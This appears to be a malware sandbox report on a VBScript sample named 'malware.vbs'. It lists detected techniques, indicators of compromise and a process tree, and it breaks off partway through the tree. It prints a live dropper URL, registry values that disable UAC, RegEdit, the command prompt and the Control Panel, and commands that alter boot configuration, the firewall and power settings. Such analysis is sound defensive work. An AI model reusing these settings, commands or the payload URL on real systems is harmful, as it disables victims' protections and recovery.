638565ad01412f15dd5782af2fe1e685d91577ddd995e5eabf46916ed7a25cb9

Analysis

max time kernel
109s
max time network
97s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 17:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware.vbs
Size

7KB
MD5

775f152b958147204f3cc3a4da63c6c8
SHA1

4814e610f5322f3a9a197c8fd2be170946732367
SHA256

638565ad01412f15dd5782af2fe1e685d91577ddd995e5eabf46916ed7a25cb9
SHA512

1bcaa377cabf089f072c8adca62a137ad5ca14ab71ddf3dda7c852ad4a841d5f1678128a0e3c2312d685af8edc5e5ea6189cba0282d93edee9fa1cdf519adc3c
SSDEEP

96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26195F:qD8qrZgX7xrCdPidfbj2619z

Score

10^/10

discovery evasion execution exploit persistence ransomware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://bonzi.link/Bon.zip

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

6020 bcdedit.exe
6036 bcdedit.exe
4232 bcdedit.exe
6080 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

75 6072 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

pid	process
6020	bcdedit.exe
6036	bcdedit.exe
4232	bcdedit.exe
6080	bcdedit.exe

flow	pid	process
75	6072	powershell.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 2 TTPs 10 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

2056 netsh.exe
5856 netsh.exe
5296 netsh.exe
5260 netsh.exe
5976 netsh.exe
1176 netsh.exe
408 netsh.exe
2168 netsh.exe
2620 netsh.exe
5708 netsh.exe
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

5636 takeown.exe
5976 icacls.exe
5928 takeown.exe
5944 icacls.exe
6076 takeown.exe
6072 icacls.exe
5588 takeown.exe
6080 icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

6072 icacls.exe
5588 takeown.exe
6080 icacls.exe
5636 takeown.exe
5976 icacls.exe
5928 takeown.exe
5944 icacls.exe
6076 takeown.exe

pid	process
2056	netsh.exe
5856	netsh.exe
5296	netsh.exe
5260	netsh.exe
5976	netsh.exe
1176	netsh.exe
408	netsh.exe
2168	netsh.exe
2620	netsh.exe
5708	netsh.exe

pid	process
5636	takeown.exe
5976	icacls.exe
5928	takeown.exe
5944	icacls.exe
6076	takeown.exe
6072	icacls.exe
5588	takeown.exe
6080	icacls.exe

pid	process
6072	icacls.exe
5588	takeown.exe
6080	icacls.exe
5636	takeown.exe
5976	icacls.exe
5928	takeown.exe
5944	icacls.exe
6076	takeown.exe

Drops file in System32 directory 19 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	OpenWith.exe

Drops file in Windows directory 1 IoCs

Processes:

netsh.exe

description ioc process

File created C:\Windows\rescache\_merged\431186354\3365242012.pri netsh.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

6056 sc.exe
5580 sc.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

6072 powershell.exe
6024 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5588 timeout.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\431186354\3365242012.pri	netsh.exe

pid	process
6056	sc.exe
5580	sc.exe

pid	process
6072	powershell.exe
6024	powershell.exe

pid	process
5588	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

6112 ipconfig.exe
380 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5312 taskkill.exe
4424 taskkill.exe
3596 taskkill.exe

pid	process
6112	ipconfig.exe
380	ipconfig.exe

pid	process
5312	taskkill.exe
4424	taskkill.exe
3596	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

netsh.exereg.exereg.exereg.exeOpenWith.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exereg.exereg.exereg.execmd.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8\@{Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-r = "Work or school account"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36865 = "WLAN Service - WFD Services Kernel Mode Driver Rules"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	OpenWith.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008b9105210faada01	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d7e53665b78b3b\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8\@{Microsoft.Windows.ShellExperienceHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms = "Windows Shell Experience"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-53500 = "Recommended Troubleshooting"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer"	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9001 = "BranchCache - Peer Discovery (Uses WSD)"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\International	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wifidisplay.dll,-100 = "Wireless Display"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d7e5369da0bc36\a01460c8\@{Microsoft.Windows.Search_1.14.2.19041_neutral_neutral_cw5n1h2txyewy?ms-resource:/ = "Windows Search"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8	netsh.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\icsvc.dll,-700 = "Virtual Machine Monitoring"	netsh.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\PreferredUILanguages = 720075002d005200550000000000	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37302 = "mDNS"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9003 = "BranchCache - Hosted Cache Client (Uses HTTPS)"	netsh.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exe

pid	process
2208	msedge.exe
2208	msedge.exe
2236	msedge.exe
2236	msedge.exe
5484	identity_helper.exe
5484	identity_helper.exe
6072	powershell.exe
6072	powershell.exe
6072	powershell.exe
6024	powershell.exe
6024	powershell.exe
6024	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

2236 msedge.exe
2236 msedge.exe
2236 msedge.exe
2236 msedge.exe
2236 msedge.exe
2236 msedge.exe
2236 msedge.exe
2236 msedge.exe
2236 msedge.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeShutdownPrivilege	4260	powercfg.exe
Token: SeCreatePagefilePrivilege	4260	powercfg.exe
Token: SeShutdownPrivilege	4556	powercfg.exe
Token: SeCreatePagefilePrivilege	4556	powercfg.exe
Token: SeShutdownPrivilege	208	powercfg.exe
Token: SeCreatePagefilePrivilege	208	powercfg.exe
Token: SeShutdownPrivilege	4080	powercfg.exe
Token: SeCreatePagefilePrivilege	4080	powercfg.exe
Token: SeDebugPrivilege	2668	whoami.exe
Token: SeTakeOwnershipPrivilege	5928	takeown.exe
Token: SeShutdownPrivilege	4396	powercfg.exe
Token: SeCreatePagefilePrivilege	4396	powercfg.exe
Token: SeShutdownPrivilege	5304	powercfg.exe
Token: SeCreatePagefilePrivilege	5304	powercfg.exe
Token: SeShutdownPrivilege	5328	powercfg.exe
Token: SeCreatePagefilePrivilege	5328	powercfg.exe
Token: SeShutdownPrivilege	552	powercfg.exe
Token: SeCreatePagefilePrivilege	552	powercfg.exe
Token: SeDebugPrivilege	5856	whoami.exe
Token: SeTakeOwnershipPrivilege	6076	takeown.exe
Token: SeTakeOwnershipPrivilege	5588	takeown.exe
Token: SeTakeOwnershipPrivilege	5636	takeown.exe
Token: SeDebugPrivilege	6072	powershell.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeDebugPrivilege	5312	taskkill.exe
Token: SeDebugPrivilege	4424	taskkill.exe
Token: SeDebugPrivilege	3596	taskkill.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe
2236	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

pid process

5264 OpenWith.exe
5576 OpenWith.exe
5848 OpenWith.exe

pid	process
5264	OpenWith.exe
5576	OpenWith.exe
5848	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exe

description	pid	process	target process
PID 2140 wrote to memory of 2604	2140	cmd.exe	net.exe
PID 2140 wrote to memory of 2604	2140	cmd.exe	net.exe
PID 2604 wrote to memory of 960	2604	net.exe	net1.exe
PID 2604 wrote to memory of 960	2604	net.exe	net1.exe
PID 2140 wrote to memory of 4260	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 4260	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 4556	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 4556	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 208	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 208	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 4080	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 4080	2140	cmd.exe	powercfg.exe
PID 2140 wrote to memory of 2056	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 2056	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 1176	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 1176	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 408	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 408	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 2168	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 2168	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 2620	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 2620	2140	cmd.exe	netsh.exe
PID 2140 wrote to memory of 5056	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 5056	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4328	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4328	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 1284	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 1284	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2692	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2692	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 3500	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 3500	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 3968	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 3968	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2712	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2712	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2956	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2956	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 3996	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 3996	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4276	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4276	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2328	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2328	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4804	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4804	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4896	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4896	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 5108	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 5108	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2100	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2100	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 1528	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 1528	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4860	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4860	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4288	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4288	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2176	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2176	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4340	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 4340	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2652	2140	cmd.exe	reg.exe
PID 2140 wrote to memory of 2652	2140	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
1⤵
PID:2968

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2140

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:960

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Windows\system32\powercfg.exe
